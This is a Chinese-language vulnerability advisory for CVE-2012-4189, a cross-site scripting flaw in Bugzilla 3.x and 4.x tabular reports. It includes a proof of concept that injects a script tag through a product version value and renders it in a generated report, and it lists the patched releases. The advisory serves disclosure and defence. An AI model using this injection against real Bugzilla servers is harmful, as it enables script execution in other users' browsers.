发布日期:2012-11-14
更新日期:2012-11-15受影响系统:
Mozilla Bugzilla 4.x
Mozilla Bugzilla 3.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 56504
CVE ID: CVE-2012-4189Bugzilla是一个开源的缺陷跟踪系统,它可以管理软件开发中缺陷的提交,修复,关闭等整个生命周期。Bugzilla没有正确过滤tabular报表内的字段值,攻击者可利用此漏洞注入代码,导致跨站脚本执行。<*来源:Mateusz Goik
链接:https://bugzilla.mozilla.org/show_bug.cgi?id=790296
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!PoC:http://localhost/cgi-bin/bug/editversions.cgi?action=add&product=TestProduct ->
Version: "><script>alert(1);</script>Add new bug to "TestProduct" with version "><script>alert(1);</script>http://localhost/cgi-bin/bug/query.cgi?format=report-table ->
Horizontal Axis: Version
should be the results: Version: "><script>alert(1);</script>
-> Generate Reporthttp://localhost/cgi-bin/bug/report.cgi?x_axis_field=version&y_axis_field=&z_axis_field=&query_format=report-table&short_desc_type=allwordssubstr&short_desc=&resolution=---&longdesc_type=allwordssubstr&longdesc=&bug_file_loc_type=allwordssubstr&bug_file_loc=&keywords_type=allwords&keywords=&deadlinefrom=&deadlineto=&bug_id=&bug_id_type=anyexact&version=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&emailassigned_to1=1&emailtype1=substring&email1=&emailassigned_to2=1&emailreporter2=1&emailcc2=1&emailtype2=substring&email2=&emaillongdesc3=1&emailtype3=substring&email3=&chfieldvalue=&chfieldfrom=&chfieldto=Now&j_top=AND&f1=noop&o1=noop&v1=&format=table&action=wrapResult:+ oColumn.field + "&version="><script>alert(1);</script>">"
elLiner.innerHTML = "<a href="buglist.cgi?action=wrap&resolution=---&version="><script>alert(1);</script>">"
<a href="buglist.cgi?action=wrap&resolution=---&version="><script>alert(1);</script>">5</a>
<a href="buglist.cgi?action=wrap&resolution=---&=%20&version="><script>alert(1);</script>">5</a>建议:
--------------------------------------------------------------------------------
厂商补丁:Mozilla
-------
目前厂商已经发布了升级补丁3.6.12, 4.0.9, 4.2.4, 4.4rc1 以修复这个安全问题,请到厂商的主页下载:http://www.mozilla.org/security/Bugzilla 错误消息信息泄露漏洞WordPress WP e-Commerce插件多个SQL注入和跨站脚本执行漏洞相关资讯 bugzilla Bugzilla安全漏洞
- 在 FreeBSD 10.2 上如何通过配置 (02月16日)
- 攻击者入侵 Bugzilla 访问未公开 (09/06/2015 21:15:51)
- Linux 安装 Bugzilla 及打补丁,添 (03/22/2015 19:35:14)
| - Bugzilla Util.pm权限提升漏洞(CVE (09/15/2015 19:09:15)
- Bugzilla 5.0 新特性:新增REST (07/31/2015 09:04:11)
- Bugzilla命令注入及安全限制绕过漏 (01/27/2015 18:39:51)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上
|